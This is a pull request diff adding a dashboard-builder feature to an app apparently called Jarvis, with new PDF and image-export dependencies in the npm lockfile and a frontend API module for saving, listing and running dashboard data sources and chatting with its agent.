### PR TITLE
feat(dashboards): Dashboard Builder — canvas-and-chat reports (static + live, scoped, themed)

### DIFF
--- a/frontend/package-lock.json
+++ b/frontend/package-lock.json
@@ -12,6 +12,8 @@
         "dompurify": "^3.4.11",
         "echarts": "^5.5.0",
         "frappe-ui": "0.1.278",
+        "html-to-image": "^1.11.13",
+        "jspdf": "^4.2.1",
         "mermaid": "^11.15.0",
         "socket.io-client": "^4.7.5",
         "vue": "^3.4.21",
@@ -35,10 +37,6 @@
         "graphology-metrics": "^2.4.0",
         "vue": "^3.4.0"
       }
-    },
-    "../wiki-graph-probe": {
-      "version": "0.0.0",
-      "extraneous": true
     },
     "node_modules/@alloc/quick-lru": {
       "version": "5.2.0",
@@ -88,7 +86,6 @@
       "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.29.7.tgz",
       "integrity": "sha512-hnORnjP/1P/zFEndoeX+n+t1RwWRJiJpM/jO7FW32Kn9r5+sJB2JWOdYo4L6k78j15eCwY3Gm/7364B1EMwtNg==",
       "license": "MIT",
-      "peer": true,
       "dependencies": {
         "@babel/types": "^7.29.7"
       },
@@ -97,6 +94,15 @@
       },
       "engines": {
         "node": ">=6.0.0"
+      }
+    },
+    "node_modules/@babel/runtime": {
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/runtime/-/runtime-7.29.7.tgz",
+      "integrity": "sha512-Nq8OhGWiZIZGV6hLHoyAKLLcJihP/xFeBMGJoUrxTX2psI8dCifzLhZISFb+VWS3wFMRDmCGw5R+dOySCqPLhw==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=6.9.0"
       }
     },
     "node_modules/@babel/types": {
@@ -529,7 +535,6 @@
       "resolved": "https://registry.npmjs.org/@floating-ui/dom/-/dom-1.7.6.tgz",
       "integrity": "sha512-9gZSAI5XM36880PPMm//9dfiEngYoC6Am2izES1FF406YFsjvyBMmeJ2g4SAju3xWwtuynNRFL2s9hgxpLI5SQ==",
       "license": "MIT",
-      "peer": true,
       "dependencies": {
         "@floating-ui/core": "^1.7.5",
         "@floating-ui/utils": "^0.2.11"
@@ -1174,7 +1179,6 @@
       "resolved": "https://registry.npmjs.org/@tiptap/core/-/core-3.27.1.tgz",
       "integrity": "sha512-rV6Qn4wmC6BxfF+4mu6bqGWj9vA4oXXhsrpXaJL2uhjxeHAGofjwcHof2X84VYzeyXgdlsGmqKie4TAppVXZUQ==",
       "license": "MIT",
-      "peer": true,
       "funding": {
         "type": "github",
         "url": "https://github.com/sponsors/ueberdosis"
@@ -1257,7 +1261,6 @@
       "resolved": "https://registry.npmjs.org/@tiptap/extension-code-block/-/extension-code-block-3.27.1.tgz",
       "integrity": "sha512-pHlzmZx2OlHfyQ0yRlT5UL4mGokz947DthZuYefN1OleVqOkHpWBG+2JQwqoNq6bmzMne92zbH32rhcJUEYSjA==",
       "license": "MIT",
-      "peer": true,
       "funding": {
         "type": "github",
         "url": "https://github.com/sponsors/ueberdosis"
@@ -1453,7 +1456,6 @@
       "resolved": "https://registry.npmjs.org/@tiptap/extension-list/-/extension-list-3.27.1.tgz",
       "integrity": "sha512-c2Upru7lj0/ZV/Ibww6cNz6sUS8m6Dp/9uygFhYcZOd3X8M0xBIEk42c6m6SQehkPziVA8QOgNJz7sMqsbz1OQ==",
       "license": "MIT",
-      "peer": true,
       "funding": {
         "type": "github",
         "url": "https://github.com/sponsors/ueberdosis"
@@ -1641,7 +1643,6 @@
       "resolved": "https://registry.npmjs.org/@tiptap/extension-text-style/-/extension-text-style-3.27.1.tgz",
       "integrity": "sha512-J48WIl+6YDYTFPhWXUBQk+u7+AKVUqTdvrZOQyPYCGuQMgHrYzgWrI5+HeEifUgXJ5rMIWWP3qytp7KhVVqpDQ==",
       "license": "MIT",
-      "peer": true,
       "funding": {
         "type": "github",
         "url": "https://github.com/sponsors/ueberdosis"
@@ -1681,7 +1682,6 @@
       "resolved": "https://registry.npmjs.org/@tiptap/extensions/-/extensions-3.27.1.tgz",
       "integrity": "sha512-1Tdx9faw8k0/83V6X+xCDVhV8yElGt95JxeW3YMkKQJI56QdlPz0xOdJPlMiSGJKinPyVier+x9LJD/YZUZIaw==",
       "license": "MIT",
-      "peer": true,
       "funding": {
         "type": "github",
         "url": "https://github.com/sponsors/ueberdosis"
@@ -1696,7 +1696,6 @@
       "resolved": "https://registry.npmjs.org/@tiptap/pm/-/pm-3.27.1.tgz",
       "integrity": "sha512-Ffjx+vimmBU7zH/KrpXzJid3+pziCe/VL2aexSTP63cyQwKQ65LkFkCKaIsSpFdQQuakVZBGWjCA5RoBV852pw==",
       "license": "MIT",
-      "peer": true,
       "dependencies": {
         "prosemirror-changeset": "^2.3.0",
         "prosemirror-commands": "^1.6.2",
@@ -1758,7 +1757,6 @@
       "resolved": "https://registry.npmjs.org/@tiptap/suggestion/-/suggestion-3.27.1.tgz",
       "integrity": "sha512-GNBPRav+lAfXzqmmUAS6ylRAn3G8JfsP6XosjoORxJIQJLx1ktDqwp6tm1Vgz9aGIM2TrBxLS1uBbI1Gb2/1VA==",
       "license": "MIT",
-      "peer": true,
       "funding": {
         "type": "github",
         "url": "https://github.com/sponsors/ueberdosis"
@@ -2063,6 +2061,19 @@
         "@types/unist": "*"
       }
     },
+    "node_modules/@types/pako": {
+      "version": "2.0.4",
+      "resolved": "https://registry.npmjs.org/@types/pako/-/pako-2.0.4.tgz",
+      "integrity": "sha512-VWDCbrLeVXJM9fihYodcLiIv0ku+AlOa/TQ1SvYOaBuyrSKgEcro95LJyIsJ4vSo6BXIxOKxiJAat04CmST9Fw==",
+      "license": "MIT"
+    },
+    "node_modules/@types/raf": {
+      "version": "3.4.3",
+      "resolved": "https://registry.npmjs.org/@types/raf/-/raf-3.4.3.tgz",
+      "integrity": "sha512-c4YAvMedbPZ5tEyxzQdMoOhhJ4RD3rngZIdwC2/qDN3d7JpEhB6fiBRKVY1lg5B7Wk+uPBjn5f39j1/2MY1oOw==",
+      "license": "MIT",
+      "optional": true
+    },
     "node_modules/@types/trusted-types": {
       "version": "2.0.7",
       "resolved": "https://registry.npmjs.org/@types/trusted-types/-/trusted-types-2.0.7.tgz",
@@ -2160,7 +2171,6 @@
       "resolved": "https://registry.npmjs.org/@vue/compiler-sfc/-/compiler-sfc-3.5.38.tgz",
       "integrity": "sha512-DuA2GiZawSEW442iw/9+Fkol8hTgb4Ke5KkhmSry65QA7YuyMbIdy8p0XZRMvNwJdgRz307W8g1CSzdvS4nuNg==",
       "license": "MIT",
-      "peer": true,
       "dependencies": {
         "@babel/parser": "^7.29.7",
         "@vue/compiler-core": "3.5.38",
@@ -2455,6 +2465,16 @@
         "postcss": "^8.1.0"
       }
     },
+    "node_modules/base64-arraybuffer": {
+      "version": "1.0.2",
+      "resolved": "https://registry.npmjs.org/base64-arraybuffer/-/base64-arraybuffer-1.0.2.tgz",
+      "integrity": "sha512-I3yl4r9QB5ZRY3XuJVEPfc2XhZO6YweFPI+UovAzn+8/hb3oJ6lnysaFcjVpkCPfVWFUDvoZ8kmVDP7WyRtYtQ==",
+      "license": "MIT",
+      "optional": true,
+      "engines": {
+        "node": ">= 0.6.0"
+      }
+    },
     "node_modules/base64-js": {
       "version": "1.5.1",
       "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz",
@@ -2543,7 +2563,6 @@
         }
       ],
       "license": "MIT",
-      "peer": true,
       "dependencies": {
         "baseline-browser-mapping": "^2.10.38",
         "caniuse-lite": "^1.0.30001799",
@@ -2611,6 +2630,26 @@
         }
       ],
       "license": "CC-BY-4.0"
+    },
+    "node_modules/canvg": {
+      "version": "3.0.11",
+      "resolved": "https://registry.npmjs.org/canvg/-/canvg-3.0.11.tgz",
+      "integrity": "sha512-5ON+q7jCTgMp9cjpu4Jo6XbvfYwSB2Ow3kzHKfIyJfaCAOHLbdKPQqGKgfED/R5B+3TFFfe8pegYA+b423SRyA==",
+      "license": "MIT",
+      "optional": true,
+      "dependencies": {
+        "@babel/runtime": "^7.12.5",
+        "@types/raf": "^3.4.0",
+        "core-js": "^3.8.3",
+        "raf": "^3.4.1",
+        "regenerator-runtime": "^0.13.7",
+        "rgbcolor": "^1.0.1",
+        "stackblur-canvas": "^2.0.0",
+        "svg-pathdata": "^6.0.3"
+      },
+      "engines": {
+        "node": ">=10.0.0"
+      }
     },
     "node_modules/chalk": {
       "version": "4.1.2",
@@ -2744,6 +2783,16 @@
         "layout-base": "^1.0.0"
       }
     },
+    "node_modules/css-line-break": {
+      "version": "2.1.0",
+      "resolved": "https://registry.npmjs.org/css-line-break/-/css-line-break-2.1.0.tgz",
+      "integrity": "sha512-FHcKFCZcAha3LwfVBhCQbW2nCNbkZXn7KVUJcsT5/P8YmfsVja0FMPJr0B903j/E69HUphKiV9iQArX8SDYA4w==",
+      "license": "MIT",
+      "optional": true,
+      "dependencies": {
+        "utrie": "^1.0.2"
+      }
+    },
     "node_modules/cssesc": {
       "version": "3.0.0",
       "resolved": "https://registry.npmjs.org/cssesc/-/cssesc-3.0.0.tgz",
@@ -2767,7 +2816,6 @@
       "resolved": "https://registry.npmjs.org/cytoscape/-/cytoscape-3.34.0.tgz",
       "integrity": "sha512-62rNSrioXw93uliKFBwjukeQyeWwH2PqDrTac31r2P6464u3AUvTk0xS4LVvT251g7IgkFunrI48ZEZGjywSOg==",
       "license": "MIT",
-      "peer": true,
       "engines": {
         "node": ">=0.10"
       }
@@ -3168,7 +3216,6 @@
       "resolved": "https://registry.npmjs.org/d3-selection/-/d3-selection-3.0.0.tgz",
       "integrity": "sha512-fmTRWbNMmsmWq6xJV8D19U/gw/bwrHfNXxrIN+HfZgnzqTHp9jOmKMhsTUjXOJnZOdZY9Q28y4yebKzqDKlxlQ==",
       "license": "ISC",
-      "peer": true,
       "engines": {
         "node": ">=12"
       }
@@ -3524,6 +3571,17 @@
         "node": ">=8.6.0"
       }
     },
+    "node_modules/fast-png": {
+      "version": "6.4.0",
+      "resolved": "https://registry.npmjs.org/fast-png/-/fast-png-6.4.0.tgz",
+      "integrity": "sha512-kAqZq1TlgBjZcLr5mcN6NP5Rv4V2f22z00c3g8vRrwkcqjerx7BEhPbOnWCPqaHUl2XWQBJQvOT/FQhdMT7X/Q==",
+      "license": "MIT",
+      "dependencies": {
+        "@types/pako": "^2.0.3",
+        "iobuffer": "^5.3.2",
+        "pako": "^2.1.0"
+      }
+    },
     "node_modules/fastq": {
       "version": "1.20.1",
       "resolved": "https://registry.npmjs.org/fastq/-/fastq-1.20.1.tgz",
@@ -3559,6 +3617,12 @@
         "classnames": "^2.2.5",
         "core-js": "^3.1.3"
       }
+    },
+    "node_modules/fflate": {
+      "version": "0.8.3",
+      "resolved": "https://registry.npmjs.org/fflate/-/fflate-0.8.3.tgz",
+      "integrity": "sha512-tbZNuJrLwGUp3zshBtdy4W+ORxZuIh8a5ilyIEQDC5rY1f3U20JMry0Ll3WBzU58EZKsEuJFXhb5gwv8CsPvgA==",
+      "license": "MIT"
     },
     "node_modules/fill-range": {
       "version": "7.1.1",
@@ -3734,9 +3798,28 @@
       "resolved": "https://registry.npmjs.org/highlight.js/-/highlight.js-11.11.1.tgz",
       "integrity": "sha512-Xwwo44whKBVCYoliBQwaPvtd/2tYFkRQtXDWj1nackaV2JPXx3L0+Jvd8/qCJ2p+ML0/XVkJ2q+Mr+UVdpJK5w==",
       "license": "BSD-3-Clause",
-      "peer": true,
       "engines": {
         "node": ">=12.0.0"
+      }
+    },
+    "node_modules/html-to-image": {
+      "version": "1.11.13",
+      "resolved": "https://registry.npmjs.org/html-to-image/-/html-to-image-1.11.13.tgz",
+      "integrity": "sha512-cuOPoI7WApyhBElTTb9oqsawRvZ0rHhaHwghRLlTuffoD1B2aDemlCruLeZrUIIdvG7gs9xeELEPm6PhuASqrg==",
+      "license": "MIT"
+    },
+    "node_modules/html2canvas": {
+      "version": "1.4.1",
+      "resolved": "https://registry.npmjs.org/html2canvas/-/html2canvas-1.4.1.tgz",
+      "integrity": "sha512-fPU6BHNpsyIhr8yyMpTLLxAbkaK8ArIBcmZIRiBLiDhjeqvXolaEmDGmELFuX9I4xDcaKKcJl+TKZLqruBbmWA==",
+      "license": "MIT",
+      "optional": true,
+      "dependencies": {
+        "css-line-break": "^2.1.0",
+        "text-segmentation": "^1.0.3"
+      },
+      "engines": {
+        "node": ">=8.0.0"
       }
     },
     "node_modules/iconv-lite": {
@@ -3810,6 +3893,12 @@
       "engines": {
         "node": ">=12"
       }
+    },
+    "node_modules/iobuffer": {
+      "version": "5.4.0",
+      "resolved": "https://registry.npmjs.org/iobuffer/-/iobuffer-5.4.0.tgz",
+      "integrity": "sha512-DRebOWuqDvxunfkNJAlc3IzWIPD5xVxwUNbHr7xKB8E6aLJxIPfNX3CoMJghcFjpv6RWQsrcJbghtEwSPoJqMA==",
+      "license": "MIT"
     },
     "node_modules/is-binary-path": {
       "version": "2.1.0",
@@ -3894,7 +3983,6 @@
       "resolved": "https://registry.npmjs.org/jiti/-/jiti-1.21.7.tgz",
       "integrity": "sha512-/imKNG4EbWNrVjoNC/1H5/9GFy+tqjGBHCaSsN+P2RnPqjsLmv6UD3Ej+Kj8nBWaRAwyk7kK5ZUc+OEatnTR3A==",
       "license": "MIT",
-      "peer": true,
       "bin": {
         "jiti": "bin/jiti.js"
       }
@@ -3904,6 +3992,23 @@
       "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-9.0.1.tgz",
       "integrity": "sha512-mxa9E9ITFOt0ban3j6L5MpjwegGz6lBQmM1IJkWeBZGcMxto50+eWdjC/52xDbS2vy0k7vIMK0Fe2wfL9OQSpQ==",
       "license": "MIT"
+    },
+    "node_modules/jspdf": {
+      "version": "4.2.1",
+      "resolved": "https://registry.npmjs.org/jspdf/-/jspdf-4.2.1.tgz",
+      "integrity": "sha512-YyAXyvnmjTbR4bHQRLzex3CuINCDlQnBqoSYyjJwTP2x9jDLuKDzy7aKUl0hgx3uhcl7xzg32agn5vlie6HIlQ==",
+      "license": "MIT",
+      "dependencies": {
+        "@babel/runtime": "^7.28.6",
+        "fast-png": "^6.2.0",
+        "fflate": "^0.8.1"
+      },
+      "optionalDependencies": {
+        "canvg": "^3.0.11",
+        "core-js": "^3.6.0",
+        "dompurify": "^3.3.1",
+        "html2canvas": "^1.0.0-rc.5"
+      }
     },
     "node_modules/katex": {
       "version": "0.16.47",
@@ -4009,7 +4114,6 @@
       "resolved": "https://registry.npmjs.org/lowlight/-/lowlight-3.3.0.tgz",
       "integrity": "sha512-0JNhgFoPvP6U6lE/UdVsSq99tn6DhjjpAj5MxG49ewd2mOBVtwWYIT8ClyABhq198aXXODMU6Ox8DrGy/CpTZQ==",
       "license": "MIT",
-      "peer": true,
       "dependencies": {
         "@types/hast": "^3.0.0",
         "devlop": "^1.0.0",
@@ -4297,6 +4401,22 @@
       "integrity": "sha512-61A5ThoTiDG/C8s8UMZwSorAGwMJ0ERVGj2OjoW5pAalsNOg15+iQiPzrLJ4jhZ1HJzmC2PIHT2oEiH3R5fzNA==",
       "license": "MIT"
     },
+    "node_modules/pako": {
+      "version": "2.2.0",
+      "resolved": "https://registry.npmjs.org/pako/-/pako-2.2.0.tgz",
+      "integrity": "sha512-zJq6RP/5q+TO2OpFV3FHzlPnFjmkb7Nc99a5SNjJE+uu/PkpChs+NIZSSzbBoD+6kjiISXjfYdwj1ZRQ81dz/w==",
+      "funding": [
+        {
+          "type": "github",
+          "url": "https://github.com/sponsors/puzrin"
+        },
+        {
+          "type": "github",
+          "url": "https://github.com/sponsors/nodeca"
+        }
+      ],
+      "license": "(MIT AND Zlib)"
+    },
     "node_modules/path-data-parser": {
       "version": "0.1.0",
       "resolved": "https://registry.npmjs.org/path-data-parser/-/path-data-parser-0.1.0.tgz",
@@ -4314,6 +4434,13 @@
       "resolved": "https://registry.npmjs.org/pathe/-/pathe-2.0.3.tgz",
       "integrity": "sha512-WUjGcAqP1gQacoQe+OBJsFA7Ld4DyXuUIjZ5cc75cLHvJ7dtNsTugphxIADwspS+AraAUePCKrSVtPLFj/F88w==",
       "license": "MIT"
+    },
+    "node_modules/performance-now": {
+      "version": "2.1.0",
+      "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz",
+      "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==",
+      "license": "MIT",
+      "optional": true
     },
     "node_modules/picocolors": {
       "version": "1.1.1",
@@ -4397,7 +4524,6 @@
         }
       ],
       "license": "MIT",
-      "peer": true,
       "dependencies": {
         "nanoid": "^3.3.12",
         "picocolors": "^1.1.1",
@@ -4778,6 +4904,16 @@
         "vue": ">= 3.2.0"
       }
     },
+    "node_modules/raf": {
+      "version": "3.4.1",
+      "resolved": "https://registry.npmjs.org/raf/-/raf-3.4.1.tgz",
+      "integrity": "sha512-Sq4CW4QhwOHE8ucn6J34MqtZCeWFP2aQSmrlroYgqAV1PjStIhJXxYuTgUIfkEk7zTLjmIjLmU5q+fbD1NnOJA==",
+      "license": "MIT",
+      "optional": true,
+      "dependencies": {
+        "performance-now": "^2.1.0"
+      }
+    },
     "node_modules/read-cache": {
       "version": "1.0.0",
       "resolved": "https://registry.npmjs.org/read-cache/-/read-cache-1.0.0.tgz",
@@ -4824,6 +4960,13 @@
       "funding": {
         "url": "https://github.com/sponsors/jonschlinkert"
       }
+    },
+    "node_modules/regenerator-runtime": {
+      "version": "0.13.11",
+      "resolved": "https://registry.npmjs.org/regenerator-runtime/-/regenerator-runtime-0.13.11.tgz",
+      "integrity": "sha512-kY1AZVr2Ra+t+piVaJ4gxaFaReZVH40AKNo7UCX6W+dEwBo/2oZJzqfuN1qLq1oL45o56cPaTXELwrTh8Fpggg==",
+      "license": "MIT",
+      "optional": true
     },
     "node_modules/reka-ui": {
       "version": "2.10.0",
@@ -4936,6 +5079,16 @@
       "engines": {
         "iojs": ">=1.0.0",
         "node": ">=0.10.0"
+      }
+    },
+    "node_modules/rgbcolor": {
+      "version": "1.0.1",
+      "resolved": "https://registry.npmjs.org/rgbcolor/-/rgbcolor-1.0.1.tgz",
+      "integrity": "sha512-9aZLIrhRaD97sgVhtJOW6ckOEh6/GnvQtdVNfdZ6s67+3/XwLS9lBcQYzEEhYVeUowN7pRzMLsyGhK2i/xvWbw==",
+      "license": "MIT OR SEE LICENSE IN FEEL-FREE.md",
+      "optional": true,
+      "engines": {
+        "node": ">= 0.8.15"
       }
     },
     "node_modules/robust-predicates": {
@@ -5120,6 +5273,16 @@
         "node": ">=0.10.0"
       }
     },
+    "node_modules/stackblur-canvas": {
+      "version": "2.7.0",
+      "resolved": "https://registry.npmjs.org/stackblur-canvas/-/stackblur-canvas-2.7.0.tgz",
+      "integrity": "sha512-yf7OENo23AGJhBriGx0QivY5JP6Y1HbrrDI6WLt6C5auYZXlQrheoY8hD4ibekFKz1HOfE48Ww8kMWMnJD/zcQ==",
+      "license": "MIT",
+      "optional": true,
+      "engines": {
+        "node": ">=0.1.14"
+      }
+    },
     "node_modules/string_decoder": {
       "version": "1.3.0",
       "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz",
@@ -5214,12 +5377,21 @@
         "url": "https://github.com/sponsors/ljharb"
       }
     },
+    "node_modules/svg-pathdata": {
+      "version": "6.0.3",
+      "resolved": "https://registry.npmjs.org/svg-pathdata/-/svg-pathdata-6.0.3.tgz",
+      "integrity": "sha512-qsjeeq5YjBZ5eMdFuUa4ZosMLxgr5RZ+F+Y1OrDhuOCEInRMA3x74XdBtggJcj9kOeInz0WE+LgCPDkZFlBYJw==",
+      "license": "MIT",
+      "optional": true,
+      "engines": {
+        "node": ">=12.0.0"
+      }
+    },
     "node_modules/tailwindcss": {
       "version": "3.4.19",
       "resolved": "https://registry.npmjs.org/tailwindcss/-/tailwindcss-3.4.19.tgz",
       "integrity": "sha512-3ofp+LL8E+pK/JuPLPggVAIaEuhvIz4qNcf3nA1Xn2o/7fb7s/TYpHhwGDv1ZU3PkBluUVaF8PyCHcm48cKLWQ==",
       "license": "MIT",
-      "peer": true,
       "dependencies": {
         "@alloc/quick-lru": "^5.2.0",
         "arg": "^5.0.2",
@@ -5275,6 +5447,16 @@
       },
       "engines": {
         "node": ">=4"
+      }
+    },
+    "node_modules/text-segmentation": {
+      "version": "1.0.3",
+      "resolved": "https://registry.npmjs.org/text-segmentation/-/text-segmentation-1.0.3.tgz",
+      "integrity": "sha512-iOiPUo/BGnZ6+54OsWxZidGCsdU8YbE4PSpdPinp7DeMtUJNJBoJ/ouUSTJjHkh1KntHaltHl/gDs2FC4i5+Nw==",
+      "license": "MIT",
+      "optional": true,
+      "dependencies": {
+        "utrie": "^1.0.2"
       }
     },
     "node_modules/thenify": {
@@ -5588,6 +5770,16 @@
       "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==",
       "license": "MIT"
     },
+    "node_modules/utrie": {
+      "version": "1.0.2",
+      "resolved": "https://registry.npmjs.org/utrie/-/utrie-1.0.2.tgz",
+      "integrity": "sha512-1MLa5ouZiOmQzUbjbu9VmjLzn1QLXBhwpUa7kdLUQK+KQ5KA9I1vk5U4YHe/X2Ch7PYnJfWuWT+VbuxbGwljhw==",
+      "license": "MIT",
+      "optional": true,
+      "dependencies": {
+        "base64-arraybuffer": "^1.0.2"
+      }
+    },
     "node_modules/uuid": {
       "version": "14.0.1",
       "resolved": "https://registry.npmjs.org/uuid/-/uuid-14.0.1.tgz",
@@ -5607,7 +5799,6 @@
       "integrity": "sha512-o5a9xKjbtuhY6Bi5S3+HvbRERmouabWbyUcpXXUA1u+GNUKoROi9byOJ8M0nHbHYHkYICiMlqxkg1KkYmm25Sw==",
       "dev": true,
       "license": "MIT",
-      "peer": true,
       "dependencies": {
         "esbuild": "^0.21.3",
         "postcss": "^8.4.43",
@@ -5667,7 +5858,6 @@
       "resolved": "https://registry.npmjs.org/vue/-/vue-3.5.38.tgz",
       "integrity": "sha512-vAMKHfImQlYSy0C+PBue4s3ERZ2xGKfgZg5GXAsLInq1dyh2H78ILVP5sK0KPFPVW4kv+OGCIvBEondcjpZp7A==",
       "license": "MIT",
-      "peer": true,
       "dependencies": {
         "@vue/compiler-dom": "3.5.38",
         "@vue/compiler-sfc": "3.5.38",
@@ -5689,7 +5879,6 @@
       "resolved": "https://registry.npmjs.org/vue-router/-/vue-router-4.6.4.tgz",
       "integrity": "sha512-Hz9q5sa33Yhduglwz6g9skT8OBPii+4bFn88w6J+J4MfEo4KRRpmiNG/hHHkdbRFlLBOqxN8y8gf2Fb0MTUgVg==",
       "license": "MIT",
-      "peer": true,
       "dependencies": {
         "@vue/devtools-api": "^6.6.4"
       },

--- a/frontend/package.json
+++ b/frontend/package.json
@@ -12,6 +12,8 @@
     "dompurify": "^3.4.11",
     "echarts": "^5.5.0",
     "frappe-ui": "0.1.278",
+    "html-to-image": "^1.11.13",
+    "jspdf": "^4.2.1",
     "mermaid": "^11.15.0",
     "socket.io-client": "^4.7.5",
     "vue": "^3.4.21",

--- a/frontend/src/api/dashboards.js
+++ b/frontend/src/api/dashboards.js
@@ -81,20 +81,24 @@ export const callDashboardTool = (tool, args = {}) => {
 // conversation is allowed - the backend creates/focuses one and returns its id
 // as `conversation_id`. -> {ok, run_id, message_id, conversation_id} or
 // {ok: false, reason} (NOT the {ok, data} envelope - passed through as-is).
-// dataMode: "static" | "live" | "" — the builder's explicit data toggle;
-// empty = let the agent decide from the ask (the backend forwards only the
-// two literal values).
-export const sendDashboardChat = (conversation, message, dataMode = "") =>
-	call("jarvis.chat.api.send_message", {
+// dataMode: "static" | "live" | anything else = Auto (backend forwards only the
+// two literal values). editingName: when revising a saved dashboard, its name —
+// forwarded as {doctype, name} so the agent gets a [Viewing:] line and reads the
+// current html/sources before changing them.
+export const sendDashboardChat = (conversation, message, dataMode = "", editingName = "") => {
+	const context = { page: "dashboards" }
+	if (dataMode === "static" || dataMode === "live") context.data_mode = dataMode
+	if (editingName) {
+		context.doctype = "Jarvis Dashboard"
+		context.name = editingName
+	}
+	return call("jarvis.chat.api.send_message", {
 		conversation: conversation || "",
 		message,
-		context: JSON.stringify(
-			dataMode === "static" || dataMode === "live"
-				? { page: "dashboards", data_mode: dataMode }
-				: { page: "dashboards" },
-		),
+		context: JSON.stringify(context),
 		background: 0,
 	})
+}
 
 // -> {conversation: {name, title, ...}, messages: [{name, seq, role, content,
 //     streaming, error, ...}]} - raises DoesNotExistError for a deleted chat.

--- a/frontend/src/api/dashboards.js
+++ b/frontend/src/api/dashboards.js
@@ -1,0 +1,95 @@
+// Dashboards-page API wrappers - thin bindings around `jarvis.chat.dashboards_api.*`
+// (src/api.js is frozen - new endpoints get per-feature modules under src/api/,
+// the api/triggers.js convention). CRUD endpoints answer with the {ok, data}
+// envelope and are unwrapped here; the two data-execution endpoints
+// (runDashboardSource / callDashboardTool) are passed through UN-unwrapped
+// because their {ok:false, error:{code, message}} arm is load-bearing - the
+// canvas maps those codes onto per-widget errors inside the iframe.
+import { call } from "frappe-ui"
+
+const DB = "jarvis.chat.dashboards_api."
+
+// {ok, data} → data (defensive: a bare payload passes through untouched)
+function unwrap(res) {
+	return res && typeof res === "object" && res.data !== undefined ? res.data : res
+}
+
+// Same request-arg normalizer as src/api.js `_page` (search/filters/sort/paging;
+// `filters` JSON-encoded so the server `frappe.parse_json`s it).
+const _page = (p = {}) => ({
+	search: p.search || "",
+	filters: JSON.stringify(p.filters || {}),
+	sort_field: p.sort_field || "",
+	sort_dir: p.sort_dir || "",
+	start: p.start || 0,
+	page_length: p.page_length || 20,
+})
+
+// ── caps probe ────────────────────────────────────────────────────────────────
+// -> {creatable_scopes: ["User", ...], manageable_roles: [...], max_sources,
+//     max_html_chars, max_rows, canvas_available}
+export const getDashboardsCaps = () => call(DB + "get_dashboards_caps").then(unwrap)
+
+// ── dashboards ────────────────────────────────────────────────────────────────
+// rows: {name, dashboard_title, description, dashboard_type, scope, target_role,
+//        target_user, owner, modified}. Allowed filter keys ONLY: scope,
+// dashboard_type, owner - unknown keys throw, so callers peel `search` out of
+// filters before calling (the MacrosList idiom).
+export const listDashboardsPage = (p) => call(DB + "list_dashboards_page", _page(p)).then(unwrap)
+
+// full detail: rows fields + html, sources:[{source_name, tool, spec}],
+// source_conversation, can_edit
+export const getDashboard = (name) => call(DB + "get_dashboard", { name }).then(unwrap)
+
+// payload keys: {name?, dashboard_title, description?, html, scope?,
+// target_role?, sources?, source_conversation?} - unknown keys throw;
+// dashboard_type is derived server-side. -> full detail
+export const saveDashboard = (payload = {}) =>
+	call(DB + "save_dashboard", { payload: JSON.stringify(payload) }).then(unwrap)
+
+export const deleteDashboard = (name) => call(DB + "delete_dashboard", { name }).then(unwrap)
+
+// View-mode data: executes the SERVER-stored spec for one named source.
+// -> {ok:true, data:{source_name, tool, rows, columns? (run_report only),
+//     truncated, took_ms}}
+//  | {ok:false, error:{code:"PermissionError"|"InvalidArgumentError"|"NotFound"
+//     |"InternalError", message}}   (envelope passed through, NOT unwrapped)
+export const runDashboardSource = (dashboard, source_name) =>
+	call(DB + "run_dashboard_source", { dashboard, source_name })
+
+// Builder-mode ad-hoc data: the iframe's declared spec executed directly via
+// the generic tool endpoint. Client-side whitelist mirrors what dashboards may
+// declare; anything else short-circuits to the same error envelope shape.
+// -> {ok, data} | {ok:false, error:{code, message}}  (NOT unwrapped)
+const DASH_TOOLS = ["query", "get_list", "run_report"]
+export const callDashboardTool = (tool, args = {}) => {
+	if (!DASH_TOOLS.includes(tool)) {
+		return Promise.resolve({
+			ok: false,
+			error: {
+				code: "InvalidArgumentError",
+				message: `Tool "${tool}" is not allowed in dashboards.`,
+			},
+		})
+	}
+	return call("jarvis.api.call_tool", { tool, args: JSON.stringify(args || {}) })
+}
+
+// ── chat pane (existing chat endpoints, reused - the triggers.js shape) ───────
+// api.js#sendMessage only forwards `context` when it carries a doctype, so the
+// dashboards pane binds send_message directly with its page context. Empty
+// conversation is allowed - the backend creates/focuses one and returns its id
+// as `conversation_id`. -> {ok, run_id, message_id, conversation_id} or
+// {ok: false, reason} (NOT the {ok, data} envelope - passed through as-is).
+export const sendDashboardChat = (conversation, message) =>
+	call("jarvis.chat.api.send_message", {
+		conversation: conversation || "",
+		message,
+		context: JSON.stringify({ page: "dashboards" }),
+		background: 0,
+	})
+
+// -> {conversation: {name, title, ...}, messages: [{name, seq, role, content,
+//     streaming, error, ...}]} - raises DoesNotExistError for a deleted chat.
+export const getDashboardConversation = (conversation) =>
+	call("jarvis.chat.api.get_conversation", { conversation })

--- a/frontend/src/api/dashboards.js
+++ b/frontend/src/api/dashboards.js
@@ -81,11 +81,18 @@ export const callDashboardTool = (tool, args = {}) => {
 // conversation is allowed - the backend creates/focuses one and returns its id
 // as `conversation_id`. -> {ok, run_id, message_id, conversation_id} or
 // {ok: false, reason} (NOT the {ok, data} envelope - passed through as-is).
-export const sendDashboardChat = (conversation, message) =>
+// dataMode: "static" | "live" | "" — the builder's explicit data toggle;
+// empty = let the agent decide from the ask (the backend forwards only the
+// two literal values).
+export const sendDashboardChat = (conversation, message, dataMode = "") =>
 	call("jarvis.chat.api.send_message", {
 		conversation: conversation || "",
 		message,
-		context: JSON.stringify({ page: "dashboards" }),
+		context: JSON.stringify(
+			dataMode === "static" || dataMode === "live"
+				? { page: "dashboards", data_mode: dataMode }
+				: { page: "dashboards" },
+		),
 		background: 0,
 	})
 

--- a/frontend/src/components/FilePreview.vue
+++ b/frontend/src/components/FilePreview.vue
@@ -37,7 +37,7 @@
 				<iframe
